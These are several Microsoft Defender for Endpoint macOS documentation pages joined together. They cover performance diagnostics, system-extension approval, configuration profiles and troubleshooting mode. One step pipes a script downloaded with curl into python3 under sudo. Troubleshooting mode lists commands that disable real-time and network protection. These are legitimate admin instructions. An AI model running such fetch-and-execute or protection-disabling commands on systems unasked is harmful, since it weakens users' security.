- curl -O https://raw.githubusercontent.com/microsoft/mdatp-xplat/master/linux/diagnostic/high_cpu_parser.py
- ```
-
- The output of this command should be similar to the following:
-
- ```Output
- --2020-11-14 11:27:27-- https://raw.githubusercontent.com/microsoft.
- mdatp-xplat/master/linus/diagnostic/high_cpu_parser.py
- Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.xxx.xxx
- Connecting to raw.githubusercontent.com (raw.githubusercontent.com)| 151.101.xxx.xxx| :443... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 1020 [text/plain]
- Saving to: 'high_cpu_parser.py'
- 100%[===========================================>] 1,020 --.-K/s in
- 0s
- ```
-
-6. Type the following commands:
-
- ```bash
- chmod +x high_cpu_parser.py
- ```
-
- ```bash
- cat real_time_protection.json | python high_cpu_parser.py > real_time_protection.log
- ```
-
- The output should be a list of the top contributors to performance issues. The first column is the process identifier (PID), the second column is the process name, and the last column is the number of scanned files, sorted by impact. Here's an example:
-
- ```output
- ... > python ~/repo/mdatp-xplat/linux/diagnostic/high_cpu_parser.py <~Downloads/output.json | head -n 10
- 27432 None 76703
- 73467 actool 1249
- 73914 xcodebuild 1081
- 73873 bash 1050
- 27475 None 836
- 1 launchd 407
- 73468 ibtool 344
- 549 telemetryd_v1 325
- 4764 None 228
- 125 CrashPlanService 164
- ```
-
-7. To improve the performance of Defender for Endpoint on Mac, locate the one with the highest number under the **Total files scanned** row, and then add an exclusion for it. For more information, see [Configure and validate exclusions for Defender for Endpoint on macOS](mac-exclusions.md).
-
- > [!NOTE]
- > The application stores statistics in memory and only keeps track of file activity since it was started and real-time protection was enabled. Processes that were launched before or during periods when real time protection was off are not counted. Additionally, only events which triggered scans are counted.
-
-7. Configure Microsoft Defender for Endpoint on macOS with exclusions for the processes or disk locations that contribute to the performance issues and re-enable real-time protection.
-
- See [Configure and validate exclusions for Microsoft Defender for Endpoint on macOS](mac-exclusions.md).
-
-## Troubleshoot performance issues using Microsoft Defender for Endpoint Client Analyzer
-
-The Microsoft Defender for Endpoint Client Analyzer (MDECA) can collect traces, logs, and diagnostic information in order to troubleshoot performance issues on [onboarded devices](/microsoft-365/security/defender-endpoint/onboard-configure) on macOS.
-
-To run the client analyzer for troubleshooting performance issues, see [Run the client analyzer on macOS and Linux](run-analyzer-macos-linux.md).
-
-> [!NOTE]
->
-> - The Microsoft Defender for Endpoint Client Analyzer tool is regularly used by Microsoft Customer Support Services (CSS) to collect information such as (but not limited to) IP addresses, PC names that will help troubleshoot issues you may be experiencing with Microsoft Defender for Endpoint. For more information about our privacy statement, see [Microsoft Privacy Statement](https://privacy.microsoft.com/privacystatement).
-> - As a general best practice, it is recommended to update the [Microsoft Defender for Endpoint agent to latest available version](linux-whatsnew.md) and confirming that the issue still persists before investigating further.
--
security Mac Support Sys Ext https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-support-sys-ext.md
- Title: Troubleshoot system extension issues for Microsoft Defender for Endpoint on macOS
-description: Troubleshoot system extension issues in Microsoft Defender for Endpoint on macOS.
------- m365-security-- tier3-- mde-macos-- Previously updated : 06/07/2023--
-# Troubleshoot system extension issues in Microsoft Defender for Endpoint on macOS
---
-**Applies to:**
--- [Microsoft Defender for Endpoint on macOS](microsoft-defender-endpoint-mac.md)-- [Microsoft Defender for Endpoint Plan 1](microsoft-defender-endpoint.md)-- [Microsoft Defender for Endpoint Plan 2](microsoft-defender-endpoint.md)-- [Microsoft Defender XDR](../defender/microsoft-365-defender.md)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/get-started/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https%3a%2f%2faka.ms%2fMDEp2OpenTrial%3focid%3ddocs-wdatp-exposedapis-abovefoldlink&brandingId=28b276fb-d2a0-4379-a7c0-57dce33da0f9&ali=1&bac=1)
-
-You can submit feedback by opening Microsoft Defender for Endpoint on Mac on your device and by navigating to **Help > Send feedback**.
-
-Another option is to submit feedback via the Microsoft Defender XDR by launching **security.microsoft.com** and selecting the **Give feedback** tab.
-
-This article provides information on how to troubleshoot issues with the system extension that's installed as part of Microsoft Defender for Endpoint on macOS.
-
-Starting with macOS BigSur (11), Apple's macOS requires all system extensions to be explicitly approved before they're allowed to run on the device.
-
-## Symptom
-
-You'll notice that the Microsoft Defender for Endpoint has an **x** symbol in the shield, as shown in the following screenshot:
--
-If you click the shield with the **x** symbol, you'll get options as shown in the following screenshot:
--
-Click **Action needed**.
-
-The screen as shown in the following screenshot appears:
--
-You can also run **mdatp health**: It reports if real-time protection is enabled but not available. This report indicates that the system extension isn't approved to run on your device.
-
-```bash
-mdatp health
-```
-The output on running **mdatp health** is:
-
-```Output
-healthy : false
-health_issues : ["no active event provider", "network event provider not running", "full disk access has not been granted"]
-...
-real_time_protection_enabled : unavailable
-real_time_protection_available: unavailable
-...
-full_disk_access_enabled : false
-```
-The output report displayed on running **mdatp health** is shown in the following screenshot:
--
-## Cause
-
-macOS requires that a user manually and explicitly approves certain functions that an application uses, for example, system extensions, running in background, sending notifications, full disk access, and so on. Microsoft Defender for Endpoint relies on these applications and can't properly function until all these consents are received from a user.
-
-If you didn't approve the system extension during the deployment/installation of Microsoft Defender for Endpoint on macOS, perform the following steps:
-
-1. Check the system extensions by running the following command in the terminal:
-
- ```BashCopy
- systemextensionsctl list
- ```
-
- :::image type="content" source="media/check-system-extension.png" alt-text="The screen that shows what should be done to check the system extension." lightbox="media/check-system-extension.png":::
-
-You'll notice that both Microsoft Defender for Endpoint on macOS extensions are in the **[activated waiting for user]** state.
-
-2. In the terminal, run the following command:
-
- ```BashCopy
- mdatp health --details system_extensions
- ```
-
-You'll get the following output:
-
-```OutputCopy
-network_extension_enabled : false
-network_extension_installed : true
-endpoint_security_extension_ready : false
-endpoint_security_extension_installed : true
-```
-
-This output is shown in the following screenshot:
--
-The following files might be missing if you're managing it via Intune, JamF, or another MDM solution:
-
-|MobileConfig (Plist) |"mdatp health" console command output |macOS setting needed for MDE on macOS to function properly |
-||||
-|"/Library/Managed Preferences/com.apple.system-extension-policy.plist" | real_time_protection_subsystem | System extension |
-|"/Library/Managed Preferences/com.apple.webcontent-filter.plist" | network_events_subsystem | Network Filter extension |
-|"/Library/Managed Preferences/com.apple.TCC.configuration-profile-policy.plist" | full_disk_access_enabled | Privacy Preference Policy Controls (PPPC, aka TCC (Transparency, Consent & Control), Full Disk Access (FDA)) |
-|"/Library/Managed Preferences/com.apple.notificationsettings.plist" | n/a | End-user notifications |
-|"/Library/Managed Preferences/servicemanagement.plist" | n/a | Background services |
-|"/Library/Managed Preferences/com.apple.TCC.configuration-profile-policy.plist" | full_disk_access_enabled (for DLP) | Accessibility |
-
-To troubleshoot the issue of missing files to make Microsoft Defender for Endpoint on macOS work properly, see [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md#microsoft-defender-for-endpoint-on-mac).
-
-## Solution
-
-This section describes the solution of approving the functions such system extension, background services, notifications, full disk access, and so on using the management tools, namely Intune, JamF, Other MDM, and using the method of manual deployment. To perform these functions using these management tools, see:
--- [Intune](manage-profiles-approve-sys-extensions-intune.md#manage-profiles-and-approve-extensions-using-intune)-- [JamF](manage-sys-extensions-using-jamf.md#manage-system-extensions-using-jamf)-- [Other MDM](manage-sys-extensions-other-mdm.md#manage-system-extensions-using-other-mdm-solutions)-- [Manual deployment](manage-sys-extensions-manual-deployment.md#manage-system-extensions-using-the-manual-methods-of-deployment)-
-### Prerequisites
-
-Prior to approving the system extension (using any of the specified management tools), ensure that the following prerequisites are fulfilled:
-
-#### Step 1: Are the profiles coming down to your macOS?
-
-If you're using Intune, see [Manage macOS software update policies in Intune](/mem/intune/protect/software-updates-macos).
--
-1. Click the ellipses (three dots).
-1. Select **Refresh devices**. The screen as shown in the following screenshot appears:
-
- :::image type="content" source="media/screen-on-clicking-refresh-devices.png" alt-text="The screen that appears on clicking Refresh devices." lightbox="media/screen-on-clicking-refresh-devices.png":::
-
-1. In Launchpad, type **System Preferences**.
-1. Double-click **Profiles**.
-
- > [!NOTE]
- > If you aren't MDM joined, you won't see **Profiles** as an option. Contact your MDM support team to see why the **Profiles** option isn't visible. You should be able to see the different profiles such as **System Extensions**, **Accessibility**, **Background Services**, **Notifications**, **Microsoft AutoUpdate**, and so on, as shown in the preceding screenshot.
-
-If you're using JamF, use sudo jamf policy. For more information, see [Policy Management](https://docs.jamf.com/10.26.0/jamf-pro/administrator-guide/Policy_Management.html#:~:text=To%20manually%20trigger%20the%20policy%20using%20the%20jamf,pre-defined%20trigger%2C%20replace%20%3CtriggerName%3E%20with%20the%20appropriate%20value.).
-
-#### Step 2: Ensure that the profiles needed for Microsoft Defender for Endpoint are enabled
-
-The section [Sections that provide guidance on enabling profiles needed for Microsoft Defender for Endpoint](#sections-that-provide-guidance-on-enabling-profiles-needed-for-microsoft-defender-for-endpoint) provides guidance on how to address this issue, depending on the method that you used to deploy Microsoft Defender for Endpoint on macOS.
-
-> [!NOTE]
-> A proper naming convention for your configuration profiles is a real advantage. We recommend the following naming scheme:
-> `Name of the Setting(s) [(additional info)] -Platform - Set - Policy-Type`
-> For example, `FullDiskAccess (piloting) - macOS - Default - MDE`
-
-Using the recommended naming convention enables you to confirm that the correct profiles are dropping down at the time of checking.
-
-> [!TIP]
-> To ensure that the correct profiles are coming down, instead of typing **.mobileconfig (plist)**, you can download this profile from Github, to avoid typos elongated hyphens.
-
-In terminal, enter the following syntax:
-
-`curl -O https://URL`
-
-For example,
-
-```BashCopy
- curl -O https://raw.githubusercontent.com/microsoft/mdatp-xplat/master/macos/mobileconfig/profiles/sysext.mobileconfig
-```
-
-##### Sections that provide guidance on enabling profiles needed for Microsoft Defender for Endpoint
-
-1.
- - **Function**: [Approve System Extensions](mac-install-with-intune.md)
- - **Mobile config (plist)**: https://github.com/microsoft/mdatp-xplat/blob/master/macos/mobileconfig/profiles/sysext.mobileconfig
- - **Applicable to**:
- - **Intune**: Yes
- - **JamF**: Yes
- - **Other MDM**: Yes
- - **Manual**: Must approve the extension by going to **Security Preferences or System Preferences > Security & Privacy** and then selecting **Allow**.
-
-2.
- - **Function**: [Network Filter](mac-install-with-intune.md)
- - **Mobile config (plist)**: https://github.com/microsoft/mdatp-xplat/blob/master/macos/mobileconfig/profiles/netfilter.mobileconfig
- - **Applicable to**:
- - **Intune**: Yes
- - **JamF**: Yes
- - **Other MDM**: Yes
- - **Manual**: Must approve the extension by going to **Security Preferences or System Preferences > Security & Privacy** and then selecting **Allow**.
-
-3.
- - **Function**: [Privacy Preference Policy Controls (PPPC, aka TCC (Transparency, Consent & Control), Full Disk Access (FDA))](mac-install-with-intune.md)
- - **Mobile config (plist)**: https://github.com/microsoft/mdatp-xplat/blob/master/macos/mobileconfig/profiles/fulldisk.mobileconfig
- - **Applicable to**:
- - **Intune**: Yes
- - **JamF**: Yes
- - **Other MDM**: Yes
- - **Manual**: Must approve the extension by going to **Security Preferences or System Preferences > Security & Privacy > Privacy > Full Disk Access** and then selecting **Allow**, and checking the box next to the following:
- - **Microsoft Defender**
- - **Microsoft Defender Security Extension**
-
-4.
- - **Function**: Running in background
- - **Mobile config (plist)**: https://github.com/microsoft/mdatp-xplat/blob/master/macos/mobileconfig/profiles/background_services.mobileconfig
- - **Applicable to**:
- - **Intune**: Yes
- - **JamF**: Yes
- - **Other MDM**: Yes
- - **Manual**: Not applicable
-
-5.
- - **Function**: Sending notifications
- - **Mobile config (plist)**: https://github.com/microsoft/mdatp-xplat/blob/master/macos/mobileconfig/profiles/notif.mobileconfig
- - **Applicable to**:
- - **Intune**: Yes
- - **JamF**: Yes
- - **Other MDM**: Yes
- - **Manual**: Not applicable
-
-6.
- - **Function**: Accessibility
- - **Mobile config (plist)**: https://github.com/microsoft/mdatp-xplat/blob/master/macos/mobileconfig/profiles/accessibility.mobileconfig
- - **Applicable to**:
- - **Intune**: Yes
- - **JamF**: Yes
- - **Other MDM**: Yes
- - **Manual**: Not applicable
-
-#### Step 3: Test the installed profiles using macOS built-in 'profile' tool. It compares your profiles with what we have published in GitHub, reporting inconsistent profiles or profiles missing altogether
-
-1. Download the script from https://github.com/microsoft/mdatp-xplat/tree/master/macos/mdm.
-1. Click **Raw**. The new URL will be https://raw.githubusercontent.com/microsoft/mdatp-xplat/master/macos/mdm/analyze_profiles.py.
-1. Save it as *analyze_profiles.py* to **Downloads** by running the following command in terminal:
-
-```BashCopy
- curl -O https://raw.githubusercontent.com/microsoft/mdatp-xplat/master/macos/mdm/analyze_profiles.py
-```
-
-4. Run the profile analyzer python3 script without any parameters by executing the following command in terminal:
-
-```BashCopy
- cd /Downloads
- sudo python3 analyze_profiles.py
-```
-
- > [!NOTE]
- > Sudo permissions are required to execute this command.
-
-OR
-
-5. Run the script directly from the Web by executing the following command:
-
-```BashCopy
- sudo curl https://raw.githubusercontent.com/microsoft/mdatp-xplat/master/macos/mdm/analyze_profiles.py
-| python3 -
-```
-
- > [!NOTE]
- > Sudo permissions are required to execute this command.
-
-The output will show all potential issues with profiles.
-
-## Recommended content
--- [Deploying Microsoft Defender for Endpoint on macOS with Jamf Pro](mac-install-with-jamf.md): Learn how to deploy Microsoft Defender for Endpoint on macOS with Jamf Pro.-- [Set up the Microsoft Defender for Endpoint on macOS policies in Jamf Pro](mac-jamfpro-policies.md): Learn how to set up the Microsoft Defender for Endpoint on macOS policies in Jamf Pro.-- [Set up device groups in Jamf Pro](mac-jamfpro-device-groups.md):
-Learn how to set up device groups in Jamf Pro for Microsoft Defender for Endpoint on macOS.
-- [Log in to Jamf Pro](mac-install-jamfpro-login.md)
security Mac Sysext Policies https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-sysext-policies.md
- Title: New configuration profiles for macOS Big Sur and newer versions of macOS
-description: This topic describes the changes that are must be made in order to benefit from the system extensions, which are a replacement for kernel extensions on macOS Big Sur and newer versions of macOS.
------- m365-security-- tier3-- mde-macos--- Previously updated : 12/18/2020--
-# New configuration profiles for macOS Big Sur and newer versions of macOS
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-If you have deployed Microsoft Defender for Endpoint on macOS in a managed environment (through JAMF, Intune, or another MDM solution), you must deploy new configuration profiles. Failure to do these steps will result in users getting approval prompts to run these new components.
-
-## JAMF
-
-### JAMF System Extensions Policy
-
-To approve the system extensions, create the following payload:
-
-1. In **Computers > Configuration Profiles** select **Options > System Extensions**.
-2. Select **Allowed System Extensions** from the **System Extension Types** drop-down list.
-3. Use **UBF8T346G9** for Team Id.
-4. Add the following bundle identifiers to the **Allowed System Extensions** list:
-
- - **com.microsoft.wdav.epsext**
- - **com.microsoft.wdav.netext**
-
- :::image type="content" source="media/mac-approved-system-extensions.png" alt-text=" The Approved system extensions page" lightbox="media/mac-approved-system-extensions.png":::
-
-### Privacy Preferences Policy Control
-
-Add the following JAMF payload to grant Full Disk Access to the Microsoft Defender for Endpoint Endpoint Security Extension. This policy is a pre-requisite for running the extension on your device.
-
-1. Select **Options** \> **Privacy Preferences Policy Control**.
-2. Use `com.microsoft.wdav.epsext` as the **Identifier** and `Bundle ID` as **Bundle type**.
-3. Set Code Requirement to `identifier "com.microsoft.wdav.epsext" and anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = UBF8T346G9`
-4. Set **App or service** to **SystemPolicyAllFiles** and access to **Allow**.
-
- :::image type="content" source="media/mac-system-extension-privacy.png" alt-text=" The Privacy Preferences Policy Control menu item" lightbox="media/mac-system-extension-privacy.png":::
-
-### Network Extension Policy
-
-As part of the Endpoint Detection and Response capabilities, Microsoft Defender for Endpoint on macOS inspects socket traffic and reports this information to the Microsoft Defender portal. The following policy allows the network extension to perform this functionality.
-
-> [!NOTE]
-> JAMF doesn't have built-in support for content filtering policies, which are a pre-requisite for enabling the network extensions that Microsoft Defender for Endpoint on macOS installs on the device. Furthermore, JAMF sometimes changes the content of the policies being deployed.
-> As such, the following steps provide a workaround that involve signing the configuration profile.
-
-1. Save the following content to your device as `com.microsoft.network-extension.mobileconfig` using a text editor:
-
- ```xml
- <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
- <plist version="1">
- <dict>
- <key>PayloadUUID</key>
- <string>DA2CC794-488B-4AFF-89F7-6686A7E7B8AB</string>
- <key>PayloadType</key>
- <string>Configuration</string>
- <key>PayloadOrganization</key>
- <string>Microsoft Corporation</string>
- <key>PayloadIdentifier</key>
- <string>DA2CC794-488B-4AFF-89F7-6686A7E7B8AB</string>
- <key>PayloadDisplayName</key>
- <string>Microsoft Defender Network Extension</string>
- <key>PayloadDescription</key>
- <string/>
- <key>PayloadVersion</key>
- <integer>1</integer>
- <key>PayloadEnabled</key>
- <true/>
- <key>PayloadRemovalDisallowed</key>
- <true/>
- <key>PayloadScope</key>
- <string>System</string>
- <key>PayloadContent</key>
- <array>
- <dict>
- <key>PayloadUUID</key>
- <string>2BA070D9-2233-4827-AFC1-1F44C8C8E527</string>
- <key>PayloadType</key>
- <string>com.apple.webcontent-filter</string>
- <key>PayloadOrganization</key>
- <string>Microsoft Corporation</string>
- <key>PayloadIdentifier</key>
- <string>CEBF7A71-D9A1-48BD-8CCF-BD9D18EC155A</string>
- <key>PayloadDisplayName</key>
- <string>Approved Network Extension</string>
- <key>PayloadDescription</key>
- <string/>
- <key>PayloadVersion</key>
- <integer>1</integer>
- <key>PayloadEnabled</key>
- <true/>
- <key>FilterType</key>
- <string>Plugin</string>
- <key>UserDefinedName</key>
- <string>Microsoft Defender Network Extension</string>
- <key>PluginBundleID</key>
- <string>com.microsoft.wdav</string>
- <key>FilterSockets</key>
- <true/>
- <key>FilterDataProviderBundleIdentifier</key>
- <string>com.microsoft.wdav.netext</string>
- <key>FilterDataProviderDesignatedRequirement</key>
- <string>identifier "com.microsoft.wdav.netext" and anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = UBF8T346G9</string>
- </dict>
- </array>
- </dict>
- </plist>
- ```
-
-2. Verify that the above file was copied correctly by running the `plutil` utility in the Terminal:
-
- ```bash
- $ plutil -lint <PathToFile>/com.microsoft.network-extension.mobileconfig
- ```
-
- For example, if the file was stored in Documents:
-
- ```bash
- $ plutil -lint ~/Documents/com.microsoft.network-extension.mobileconfig
- ```
-
- Verify that the command outputs `OK`.
-
- ```bash
- <PathToFile>/com.microsoft.network-extension.mobileconfig: OK
- ```
-
-3. Follow the instructions on [this page](https://www.jamf.com/jamf-nation/articles/649/creating-a-signing-certificate-using-jamf-pro-s-built-in-certificate-authority) to create a signing certificate using JAMF's built-in certificate authority.
-
-4. After the certificate is created and installed to your device, run the following command from the Terminal to sign the file:
-
- ```bash
- $ security cms -S -N "<CertificateName>" -i <PathToFile>/com.microsoft.network-extension.mobileconfig -o <PathToSignedFile>/com.microsoft.network-extension.signed.mobileconfig
- ```
-
- For example, if the certificate name is **SigningCertificate** and the signed file is going to be stored in Documents:
-
- ```bash
- $ security cms -S -N "SigningCertificate" -i ~/Documents/com.microsoft.network-extension.mobileconfig -o ~/Documents/com.microsoft.network-extension.signed.mobileconfig
- ```
-
-5. From the JAMF portal, navigate to **Configuration Profiles** and click the **Upload** button. Select `com.microsoft.network-extension.signed.mobileconfig` when prompted for the file.
-
-## Intune
-
-### Intune System Extensions Policy
-
-To approve the system extensions:
-
-1. In Intune, open **Manage** \> **Device configuration**. Select **Manage** \> **Profiles** \> **Create Profile**.
-2. Choose a name for the profile. Change **Platform=macOS** to **Profile type=Extensions**. Select **Create**.
-3. In the `Basics` tab, give a name to this new profile.
-4. In the `Configuration settings` tab, add the following entries in the `Allowed system extensions` section:
-
- <br>
-
- ****
-
- |Bundle identifier|Team identifier|
- |||
- |com.microsoft.wdav.epsext|UBF8T346G9|
- |com.microsoft.wdav.netext|UBF8T346G9|
- |||
-
- :::image type="content" source="media/mac-system-extension-intune2.png" alt-text=" The System configuration profiles page" lightbox="media/mac-system-extension-intune2.png":::
-
-5. In the `Assignments` tab, assign this profile to **All Users & All devices**.
-6. Review and create this configuration profile.
-
-### Create and deploy the Custom Configuration Profile
-
-The following configuration profile enables the network extension and grants Full Disk Access to the Endpoint Security system extension.
-
-Save the following content to a file named **sysext.xml**:
-
-```xml
-<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1">
- <dict>
- <key>PayloadUUID</key>
- <string>7E53AC50-B88D-4132-99B6-29F7974EAA3C</string>
- <key>PayloadType</key>
- <string>Configuration</string>
- <key>PayloadOrganization</key>
- <string>Microsoft Corporation</string>
- <key>PayloadIdentifier</key>
- <string>7E53AC50-B88D-4132-99B6-29F7974EAA3C</string>
- <key>PayloadDisplayName</key>
- <string>Microsoft Defender System Extensions</string>
- <key>PayloadDescription</key>
- <string/>
- <key>PayloadVersion</key>
- <integer>1</integer>
- <key>PayloadEnabled</key>
- <true/>
- <key>PayloadRemovalDisallowed</key>
- <true/>
- <key>PayloadScope</key>
- <string>System</string>
- <key>PayloadContent</key>
- <array>
- <dict>
- <key>PayloadUUID</key>
- <string>2BA070D9-2233-4827-AFC1-1F44C8C8E527</string>
- <key>PayloadType</key>
- <string>com.apple.webcontent-filter</string>
- <key>PayloadOrganization</key>
- <string>Microsoft Corporation</string>
- <key>PayloadIdentifier</key>
- <string>CEBF7A71-D9A1-48BD-8CCF-BD9D18EC155A</string>
- <key>PayloadDisplayName</key>
- <string>Approved Network Extension</string>
- <key>PayloadDescription</key>
- <string/>
- <key>PayloadVersion</key>
- <integer>1</integer>
- <key>PayloadEnabled</key>
- <true/>
- <key>FilterType</key>
- <string>Plugin</string>
- <key>UserDefinedName</key>
- <string>Microsoft Defender Network Extension</string>
- <key>PluginBundleID</key>
- <string>com.microsoft.wdav</string>
- <key>FilterSockets</key>
- <true/>
- <key>FilterDataProviderBundleIdentifier</key>
- <string>com.microsoft.wdav.netext</string>
- <key>FilterDataProviderDesignatedRequirement</key>
- <string>identifier &quot;com.microsoft.wdav.netext&quot; and anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = UBF8T346G9</string>
- </dict>
- <dict>
- <key>PayloadUUID</key>
- <string>56105E89-C7C8-4A95-AEE6-E11B8BEA0366</string>
- <key>PayloadType</key>
- <string>com.apple.TCC.configuration-profile-policy</string>
- <key>PayloadOrganization</key>
- <string>Microsoft Corporation</string>
- <key>PayloadIdentifier</key>
- <string>56105E89-C7C8-4A95-AEE6-E11B8BEA0366</string>
- <key>PayloadDisplayName</key>
- <string>Privacy Preferences Policy Control</string>
- <key>PayloadDescription</key>
- <string/>
- <key>PayloadVersion</key>
- <integer>1</integer>
- <key>PayloadEnabled</key>
- <true/>
- <key>Services</key>
- <dict>
- <key>SystemPolicyAllFiles</key>
- <array>
- <dict>
- <key>Identifier</key>
- <string>com.microsoft.wdav.epsext</string>
- <key>CodeRequirement</key>
- <string>identifier "com.microsoft.wdav.epsext" and anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = UBF8T346G9</string>
- <key>IdentifierType</key>
- <string>bundleID</string>
- <key>StaticCode</key>
- <integer>0</integer>
- <key>Allowed</key>
- <integer>1</integer>
- </dict>
- </array>
- </dict>
- </dict>
- </array>
- </dict>
-</plist>
-```
-
-Verify that the above file was copied correctly. From the Terminal, run the following command and verify that it outputs `OK`:
-
-```bash
-$ plutil -lint sysext.xml
-sysext.xml: OK
-```
-
-To deploy this custom configuration profile:
-
-1. In Intune, open **Manage** \> **Device configuration**. Select **Manage** \> **Profiles** \> **Create profile**.
-2. Choose a name for the profile. Change **Platform=macOS** and **Profile type=Custom**. Select **Configure**.
-3. Open the configuration profile and upload **sysext.xml**. This file was created in the preceding step.
-4. Select **OK**.
-
- :::image type="content" source="media/mac-system-extension-intune.png" alt-text=" The System extension in Intune page" lightbox="media/mac-system-extension-intune.png":::
-
-5. In the `Assignments` tab, assign this profile to **All Users & All devices**.
-6. Review and create this configuration profile.
security Mac Troubleshoot Mode https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-troubleshoot-mode.md
- Title: Troubleshooting mode in Microsoft Defender for Endpoint on macOS
-description: This article describes how to enable the troubleshooting mode in Microsoft Defender for Endpoint on macOS.
------- m365-security-- tier3-- mde-macos-- Previously updated : 02/06/2024--
-# Troubleshooting mode in Microsoft Defender for Endpoint on macOS
--
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint on macOS](microsoft-defender-endpoint-mac.md)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-This article describes how to enable the troubleshooting mode in Microsoft Defender for Endpoint on macOS so admins can troubleshoot various Microsoft Defender Antivirus features temporarily, even if organizational policies manage the devices.
-
-For example, if the tamper protection is enabled, certain settings can't be modified or turned off, but you can use troubleshooting mode on the device to edit those settings temporarily.
-
-Troubleshooting mode is disabled by default, and requires you to turn it on for a device (and/or group of devices) for a limited time. Troubleshooting mode is exclusively an enterprise-only feature, and requires access to [Microsoft Defender portal](https://security.microsoft.com/).
-
-## What do you need to know before you begin
-
-During the troubleshooting mode, you can:
--- Use Microsoft Defender for Endpoint on macOS functional troubleshooting /application compatibility (false positives).-- Local admins, with appropriate permissions, can change the following policy locked configurations on individual endpoints:-
- | Setting | Enable | Disable/Remove |
- | -| - | -|
- | Real-Time Protection/ Passive mode / On-Demand | `mdatp config real-time-protection --value enabled` | `mdatp config real-time-protection --value disabled` |
- | Network Protection | `mdatp config network-protection enforcement-level --value block` | `mdatp config network-protection enforcement-level --value disabled` |
- | realTimeProtectionStatistics | `mdatp config real-time-protection-statistics --value enabled` | `mdatp config real-time-protection-statistics --value disabled` |
- | tags | `mdatp edr tag set --name GROUP --value [name]` | `mdatp edr tag remove --tag-name [name]` |
- | groupIds | `mdatp edr group-ids --group-id [group]`| |
- | Endpoint DLP | `mdatp config data_loss_prevention --value enabled` | `mdatp config data_loss_prevention --value disabled` |
-
-During troubleshooting mode, you can't:
--- Disable tamper protection for Microsoft Defender for Endpoint on macOS.-- Uninstall the Microsoft Defender for Endpoint on macOS.-
-### Prerequisites
--- Supported version of macOS for Microsoft Defender for Endpoint.-- Microsoft Defender for Endpoint must be tenant-enrolled and active on the device.-- Permissions for "Manage security settings in Security Center" in Microsoft Defender for Endpoint.-- Platform Update version: [101.23122.0005](
-mac-whatsnew.md#jan-2024-build-101231220005release-version-2012312250)
-or newer.
-
-## Enable troubleshooting mode on macOS
-
-1. Go to the [Microsoft Defender portal](https://security.microsoft.com/), and sign in.
-2. Navigate to the device page you would like to turn on troubleshooting mode. Then, select the ellipses(...) and select **Turn on troubleshooting mode**.
-
- :::image type="content" source="media/troubleshooting-mode-on-mac.png" alt-text="Screenshot displaying the screenshot of the troubleshooting mode on mac.":::
-
- > [!NOTE]
- > The **Turn on troubleshooting mode** option is available on all devices, even if the device does not meet the prerequisites for troubleshooting mode.
-
-3. Read the information displayed on the pane and once you're ready, select **Submit** to confirm that you want to turn on troubleshooting mode for that device.
-4. You'll see *It might take a few minutes for the change to take effect* text being displayed. During this time, when you select the ellipses again, you'll see the **Turn On Troubleshooting mode is pending** option grayed-out.
-5. Once complete, the device page shows that the device is now in troubleshooting mode.
-
- If the end-user is logged-in on the macOS device, they'll see the following text:
-
- *Troubleshooting mode has started. This mode allows you to temporarily change settings that are managed by your Administrator. Expires at YEAR-MM-DDTHH:MM:SSZ.*
-
- Select **OK**.
-
-6. Once enabled, you can test the different command line options that are togglable in the troubleshooting mode (TS Mode).
-
- For example, when you use `mdatp config real-time-protection --value disabled` command to disable real time protection, you'll be prompted to enter your password. Select **OK** after entering your password.
-
- :::image type="content" source="media/ts-mode-rtp-disable.png" alt-text="Screenshot displaying the screenshot of real time protection being disabled.":::
-
- The output report similar to the following screenshot will be displayed on running mdatp health with `real_time_protection_enabled` as "false" and `tamper_protection` as "block."
-
- :::image type="content" source="mediatp health running.":::
-
-## Advanced hunting queries for detection
-
-There are some prebuilt advanced hunting queries to give you visibility into the troubleshooting events that are occurring in your environment. You can use these queries to [create detection rules](../defender/custom-detection-rules.md) to generate alerts when devices are in troubleshooting mode.
